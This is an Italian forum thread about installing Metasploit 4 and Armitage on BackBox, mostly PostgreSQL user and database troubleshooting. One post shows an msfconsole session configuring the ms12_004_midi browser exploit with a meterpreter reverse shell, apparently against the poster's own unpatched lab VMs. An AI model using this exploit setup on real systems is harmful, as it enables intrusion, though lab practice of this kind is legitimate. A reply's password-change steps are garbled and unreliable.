armitage e metasploit

Started by dravok, December 30, 2011, 10:49:20 AM

Previous topic - Next topic

dravok

dato che ho installato la versione metasploit 3, volevo aggiornare al 4, inoltre, come suggeritomi, volevo cambiare la passw database da quella scelta precedentemente in backbox. solo che ho questo problema

Quotecreateuser: creazione del nuovo utente fallita: ERROR:  role "backbox" already exists


come faccio a cancellarlo e creare un nuovo utente?

ho controllato la pagina

Quotesudo geany /opt/config/database.yml

ma la pagina è vuota..

in caso.. come cambio solo la passw?

dravok

#1
ho visto ora nel wikibackbox come cancellare l utente, ..  che fa fare.. non conoscere l 'inglese..

ora ci provo e poi vi dico..

intanto ho provato alcune soluzioni del sito armitage.. ma alcune directory non le trova..

---------------------edito-----------------------------

dravok@Laptop:~$ postgres@backbox:~$ psql -l
postgres@backbox:~$: comando non trovato
dravok@Laptop:~$ psql -l
psql: FATAL:  Ident authentication failed for user "dravok"
dravok@Laptop:~$ sudo su
[sudo] password for dravok:
root@Laptop:/home/dravok# psql -l
psql: FATAL:  Ident authentication failed for user "root"
root@Laptop:/home/dravok# psql -l
psql: FATAL:  Ident authentication failed for user "root"



nada.. sbaglio qualcosa.. se vedo il nome dei database che in questi mesi ho creato potrei cancellare il tutto e rifare da capo.. ma cosi ..

----------------------------------------------------ri edito------------------


[sudo] password for dravok:
* Starting PostgreSQL 8.4 database server                               [ OK ]

dravok@Laptop:~$ select version()
bash: errore di sintassi vicino il simbolo non atteso "("
dravok@Laptop:~$ psql -l
psql: FATAL:  Ident authentication failed for user "dravok"


sono andato nel sito https://community.rapid7.com/docs/DOC-1268 con l aiuto di google trasl

ma non riesco a uscire dall errore, intanto provando ad avviare armitage si chiude sempre dopo aver caricato il java.

mi sto seriamente stufando.. ora mi converto del tutto alla console msf

Bdragon

Quote from: dravok on December 30, 2011, 12:00:39 PM
ho visto ora nel wikibackbox come cancellare l utente, ..  che fa fare.. non conoscere l 'inglese..

ora ci provo e poi vi dico..

intanto ho provato alcune soluzioni del sito armitage.. ma alcune directory non le trova..

---------------------edito-----------------------------

dravok@Laptop:~$ postgres@backbox:~$ psql -l
postgres@backbox:~$: comando non trovato
dravok@Laptop:~$ psql -l
psql: FATAL:  Ident authentication failed for user "dravok"
dravok@Laptop:~$ sudo su
[sudo] password for dravok:
root@Laptop:/home/dravok# psql -l
psql: FATAL:  Ident authentication failed for user "root"
root@Laptop:/home/dravok# psql -l
psql: FATAL:  Ident authentication failed for user "root"



nada.. sbaglio qualcosa.. se vedo il nome dei database che in questi mesi ho creato potrei cancellare il tutto e rifare da capo.. ma cosi ..

----------------------------------------------------ri edito------------------


[sudo] password for dravok:
* Starting PostgreSQL 8.4 database server                               [ OK ]

dravok@Laptop:~$ select version()
bash: errore di sintassi vicino il simbolo non atteso "("
dravok@Laptop:~$ psql -l
psql: FATAL:  Ident authentication failed for user "dravok"


sono andato nel sito https://community.rapid7.com/docs/DOC-1268 con l aiuto di google trasl

ma non riesco a uscire dall errore, intanto provando ad avviare armitage si chiude sempre dopo aver caricato il java.

mi sto seriamente stufando.. ora mi converto del tutto alla console msf



Ciao

vai all'utente che devi cambiare password e la cambi:

sudo "UTENTE DA MODIFICARE"
"DIGITARE VECCHIA PASSWORD" "PREMERE INVIO"
passwd "PREMERE INVIO"
"DIGITARE LA NUOVA PASSWORD"
XForceTeam - Malware Analysis & NSM
http://www.xforceteam.com
www.facebook.com/pages/XForceTeam/353616747996041
https://twitter.com/XForceTeam
https://plus.google.com/116405858798145396792/posts
www.linkedin.com/groups?home=&gid=4324913
www.youtube.com/user/WebProgNet

dravok

#3
ok per il cambia passw ma prima devo vedere a che nome avevo creato i vecchi db

intanto nuovo problema

sto testando il sistema recente che sfrutta il buco di internet explorer 6 7 8 solo che ho un conflitto di utilizzo della porta 80..

come faccio ad assegnare la 80 solo a questa richiesta e cacciare il motivo che utilizzava la 80.. almeno finche non provo questo metodo..

vi do le info a riguardo

modem alice con porte apribili o chiudibili a mio piacere.

notebook hp con bbox

in virtuale collegati in bridge ho un sistema seven da 32 e un xp sp2. entrambi non li ho volutamente aggiornati per testare metasploit.

ecco la shell della console mtsploit

      =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 795 exploits - 433 auxiliary - 131 post
+ -- --=[ 239 payloads - 27 encoders - 8 nops
      =[ svn r14631 updated today (2012.01.28)

msf >
msf > use exploit/windows/browser/ms12_004_midi
msf  exploit(ms12_004_midi) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf  exploit(ms12_004_midi) > set SRVPORT 80
SRVPORT => 80
msf  exploit(ms12_004_midi) > set URIPATH /
URIPATH => /
msf  exploit(ms12_004_midi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.5:4444
[-] Exploit exception: The address is already in use (192.168.1.5:80).
msf  exploit(ms12_004_midi) >



quello che vedete è il mio ip locale.

ora dice che la porta 80 è in uso.. cosa faccio?

per osservare le porte ho provato

vedere le connessioni, le porte attive

netstat -a


man netstat


netstat -na | grep LISTEN


nmap -sT 127.0.0.1


netstat -n --udp --tcp -p -l


ma non capisco..

mi potete aiutare.. son disponibile a inviare altri dati se mi dite quali e come prenderli

dravok

msf  exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     192.168.1.5      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.5      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms12_004_midi) >


intanto provo a cambiare la passw del db cosi attivo armitage

dravok

nel frattempo che attendo una risposta per il post precedente,.. ho provato a osservare i db attivi, nulla mi da errore richiesta, ho cancellato l user e lho rifatto con nome backbox e passw uguale.. dice ok, apro armitage ma stavolta armitage è diverso, non cè piu la scelta ..DBConnect String  ...DB DRIVER..

ma solo nome utente e passw    host e porta.

metto nome utente backbox, passw backbox  e avvio.. carica il java e dice

Could not connect to database: ERROR relation "workspaces" does not exist

guardo nel sito armitage il numero 5 che continua 

Your database is not initialized yet. Armitage can't do this. Run msfconsole once. This will intialize the database for you. You shouldn't see this error again.


ma io ho ricreato il database e gli utenti cosi

postgres@Laptop:/home/dravok$ psql-l
psql-l: comando non trovato
postgres@Laptop:/home/dravok$ cd
postgres@Laptop:~$ psql-l
psql-l: comando non trovato
postgres@Laptop:~$ dropuser backbox
postgres@Laptop:~$ createuser backbox -P
Inserisci la password per il nuovo utente:
Conferma password:
Il nuovo utente dev'essere un superuser? (s/n) n
Il nuovo utente può creare database? (s/n) n
Il nuovo utente può creare altri utenti? (s/n) n
postgres@Laptop:~$ dropuser backbox
postgres@Laptop:~$ createuser backbox -P
Inserisci la password per il nuovo utente:
Conferma password:
Le password non corrispondono.
postgres@Laptop:~$ createuser backbox -P
Inserisci la password per il nuovo utente:
Conferma password:
Il nuovo utente dev'essere un superuser? (s/n) n
Il nuovo utente può creare database? (s/n) n
Il nuovo utente può creare altri utenti? (s/n) n
postgres@Laptop:~$ createdb --owner=backbox metasploit4
postgres@Laptop:~$


che sbaglio?

armitage e msfconsole non comunicano?